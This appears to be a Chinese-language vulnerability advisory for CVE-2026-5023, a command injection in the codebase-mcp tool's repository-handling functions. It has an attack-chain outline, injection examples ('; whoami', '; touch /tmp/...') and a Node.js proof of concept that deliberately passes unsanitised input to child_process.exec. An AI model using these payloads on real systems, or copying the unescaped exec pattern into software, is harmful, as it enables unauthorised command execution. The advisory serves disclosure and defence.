CVE-2026-5023 codebase-mcp 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5023

漏洞类型

操作系统命令注入

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

DeDeveloper23 codebase-mcp

漏洞概述

DeDeveloper23 codebase-mcp 项目中的 RepoMix Command Handler 组件被发现存在安全漏洞。该漏洞影响 src/tools/codebase.ts 文件中的特定函数，由于对用户输入处理不当，导致操作系统命令注入风险。攻击者需在本地拥有低权限即可利用此漏洞，且无需用户交互。由于产品采用滚动发布模式，受影响版本截止至特定提交 3ec749d237dd8eabbeef48657cf917275792fde6。目前漏洞利用细节已公开，但项目方尚未做出响应，建议用户关注后续更新。

技术细节

该漏洞位于 DeDeveloper23 codebase-mcp 的 src/tools/codebase.ts 文件中，主要涉及 getCodebase、getRemoteCodebase 和 saveCodebase 三个函数。其根本原因在于代码在处理外部输入（如代码库 URL 或路径）时，未进行有效的安全过滤或转义，直接将其拼接到系统调用命令中（例如使用 Node.js 的 child_process.exec）。攻击者可以通过注入 Shell 元字符（如分号、管道符或反引号）来截断原有命令并追加执行任意恶意指令。由于攻击向量为本地（AV:L）且权限要求较低（PR:L），一旦攻击者获得本地访问权限，即可利用此漏洞读取敏感文件、修改系统配置或破坏服务可用性。鉴于该组件通常用于处理代码仓库操作，攻击者可能通过构造恶意的仓库地址触发漏洞。

攻击链分析

STEP 1

侦察

攻击者确认目标系统本地安装了 DeDeveloper23 codebase-mcp 组件。

STEP 2

获取访问

攻击者获得目标系统的本地低权限访问账户。

STEP 3

漏洞利用

攻击者调用受影响的函数（如 getRemoteCodebase），并注入包含 Shell 元字符的恶意参数（例如 URL 中包含 '; whoami'）。

STEP 4

命令执行

由于输入未经过滤，操作系统将注入的恶意命令与原命令一起执行。

STEP 5

达成影响

攻击者成功在系统上执行未授权代码，可能造成数据泄露或系统破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-5023: OS Command Injection in codebase-mcp
// This demonstrates a payload that could be passed to the vulnerable function.

const { exec } = require('child_process');

// Simulating the vulnerable function behavior in src/tools/codebase.ts
function vulnerableGetRemoteCodebase(userInputUrl) {
    // Vulnerability: Directly interpolating user input into a shell command
    const command = `git clone ${userInputUrl}`;
    console.log(`Executing: ${command}`);
    
    exec(command, (error, stdout, stderr) => {
        if (error) {
            console.error(`Error: ${error.message}`);
            return;
        }
        console.log(`Stdout: ${stdout}`);
    });
}

// Exploit Payload
// Using a semicolon to chain a command that creates a file as proof of execution
const maliciousInput = "https://github.com/valid/repo.git; touch /tmp/pwn_cve_2026_5023";

vulnerableGetRemoteCodebase(maliciousInput);

影响范围

DeDeveloper23 codebase-mcp up to 3ec749d237dd8eabbeef48657cf917275792fde6

防御指南

临时缓解措施

在官方发布修复补丁前，建议严格限制对该工具的调用权限，避免在不受信的环境中使用。可以通过配置操作系统的访问控制列表（ACL）或沙箱环境来隔离该进程，防止命令注入后影响宿主机系统安全。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5023
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5023
3 Details https://www.cvedetails.com/cve/CVE-2026-5023/
4 VulDB https://vuldb.com/cve/CVE-2026-5023
5 Link https://github.com/DeDeveloper23/codebase-mcp/
6 Link https://github.com/DeDeveloper23/codebase-mcp/issues/7
7 Link https://vuldb.com/submit/778348
8 Link https://vuldb.com/vuln/353907
9 Link https://vuldb.com/vuln/353907/cti